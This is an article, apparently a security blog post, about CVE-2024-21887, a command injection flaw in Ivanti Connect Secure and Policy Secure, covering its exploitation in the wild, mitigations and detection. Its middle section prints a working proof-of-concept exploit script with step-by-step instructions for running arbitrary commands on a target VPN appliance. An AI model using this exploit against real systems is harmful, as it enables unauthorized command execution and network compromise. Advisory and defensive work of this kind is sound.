Ivanti Connect and Policy Secure: Analyzing CVE-2024-21887

In an era where our reliance on digital infrastructures is at an all-time high, the recent identification of CVE-2024-21887 emerges as a critical reminder of the ongoing battle in cyberspace.

Falling under the spotlight for its potential to disrupt and compromise, CVE-2024-21887 stands out as a severe command injection flaw within the widely used Ivanti Connect Secure and Policy Secure solutions.

Targeting specific versions, this vulnerability could enable nefarious entities to carry out unauthorized commands, putting sensitive data and network integrity at risk.

As the cybersecurity community rallies to address this threat, we delve into the significance of CVE-2024-21887 and what it means for the future of digital security.

Ivanti Connect Secure Command Injection Vulnerability

Understanding CVE-2024-21887 Severity and Implications

A high-risk security issue, designated as CVE-2024-21887, has been identified in the web component of Ivanti Connect Secure (ICS) as well as Ivanti Policy Secure systems.

Assigned a critical Common Vulnerability Scoring System (CVSS) rating of 9.1, this vulnerability exposes a command injection flaw that authenticated users could exploit to carry out arbitrary command executions.

This critical flaw presents a serious risk because it could potentially allow an attacker with administrative access to run unauthorized commands on the operating appliance, paving the way for a full compromise.

The Scope and Impact of the CVE-2024-21887 Exploit

CVE-2024-21887 has been confirmed to be present across all currently maintained releases of both Ivanti ICS and Policy Secure versions 9.x and 22.x.

Notably, it was utilized in conjunction with another vulnerability, CVE-2023-46805, for a sophisticated series of unauthenticated remote code execution attacks that began as early as December 3, 2023.

The threat actor behind these incidents, identified as UTA0178 and suspected to be state-sponsored by China, leveraged these vulnerabilities to deliver the GLASSTOKEN web shell onto target networks, thereby ensuring long-term access.

Attack Vectors Utilized by Cybercriminals

Cyber attackers exploited legitimate features within Ivanti Connect Secure—specifically compcheck.cgi—to perform unauthorized remote command executions and steal credentials.

Their tactics included conducting preliminary reconnaissance, moving laterally through compromised networks, and establishing GLASSTOKEN web shells for sustained access.

Comprehensive Guide to Exploiting CVE-2024-21887

In this tutorial, we’re going to discuss a serious security flaw identified as CVE-2024-21887, which affects the web components of Ivanti Connect Secure versions 9.x and 22.x, along with Ivanti Policy Secure.

An authenticated administrator with nefarious intentions could exploit this vulnerability to execute arbitrary commands on the system by sending specially crafted requests.

Identifying the Vulnerability

A Proof-of-Concept (PoC) script has been uploaded to GitHub that demonstrates how the exploit can be executed. It’s named CVE-2024-21887.sh and is designed to test whether a system is susceptible to this vulnerability.

The script:

#!/bin/sh

if [ "$#" -ne 2 ]; then
    echo "missing arguments like:"
    echo "./CVE-2024-21887.sh https://my.vpn.ip:443 \"payload_cmd\""
    exit 1
fi

payload=$(echo ";$2;" | xxd -p|tr -d \\n|sed 's/../%&/g')

curl -k -s --path-as-is "$1/api/v1/totp/user-backup-code/../../license/keys-status/$payload" 

Step-by-Step Tutorial on Using the PoC Script

Preparing the PoC Script

Before running the script, ensure it has executable permissions. You can modify these permissions using the chmod command:

chmod +x CVE-2024-21887.sh

Make sure to have the required applications installed on your system. These include:

  • curl: For transferring data from or to a server.
  • xxd: Converts binary data to and from hexadecimal.
  • tr: Translates or deletes characters.
  • sed: Functions as a stream editor.

Running the PoC Script

To run the proof-of-concept script, use the following structure:

./CVE-2024-21887.sh [http(s)://target_domain:port] [command_to_execute]

For instance, if you wanted to create a file named “pwned” in the /tmp directory on the target VPN device, your command would look like this:

./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

Interpreting the Results

When you execute the PoC script, watch out for any output that indicates successful execution of your payload.

If you see results being printed to your screen, this suggests that the target system is vulnerable and your arbitrary command (payload_cmd) was executed.

Mitigating the Risks: Strategies and Solutions

At the time of this advisory, Ivanti has yet to provide a dedicated patch for CVE-2024-21887. They have, however, released a mitigation script that should be applied immediately as an interim protective measure.

Additionally, Ivanti has announced an impending rollout of updates to address this issue, which is scheduled to commence in stages starting the week of January 22, 2024.

Users and system administrators responsible for any vulnerable installations are strongly encouraged to implement Ivanti’s suggested mitigation as soon as possible.

Methods for Detecting Potential Security Breaches

To identify any possible breaches, organizations should conduct thorough analyses of network traffic and VPN device logs, in conjunction with deploying Ivanti’s Integrity Checker Tool.

Vigilance in monitoring for evidence of a compromise is advised, including a deep dive into network activity and VPN logs for anomalies.

If the system is vulnerable, immediate action is necessary. As of the writing of this tutorial, Ivanti has not released a specific patch for CVE-2024-21887.

However, they have issued a mitigation script that should be used right away to reduce risk until a formal update is available.

Proactive Steps to Bolster Security

In light of these threats, it is of paramount importance to apply the aforementioned mitigation strategies right away, maintaining a vigilant stance until official patches are distributed.

Continual network surveillance is also crucial in detecting and responding to signs of network infiltration to preserve organizational cybersecurity integrity.

Conclusion

The discovery of CVE-2024-21887 underscores an urgent need for vigilance and immediate action within the cybersecurity community.

As organizations grapple with the potential implications of such a security flaw, it is evident that preemptive measures and rapid responses are crucial for maintaining the integrity and trustworthiness of affected systems.

It is imperative that network administrators prioritize patching their systems and follow any remediation guidelines provided by Ivanti.

Moreover, frequent system updates and a robust monitoring process of security advisories will ensure that similar vulnerabilities in the future can be identified and mitigated swiftly.

CVE-2024-21887 is not just a wake-up call, but a reminder that proactive and informed security practices are the bedrock on which digital safety lies.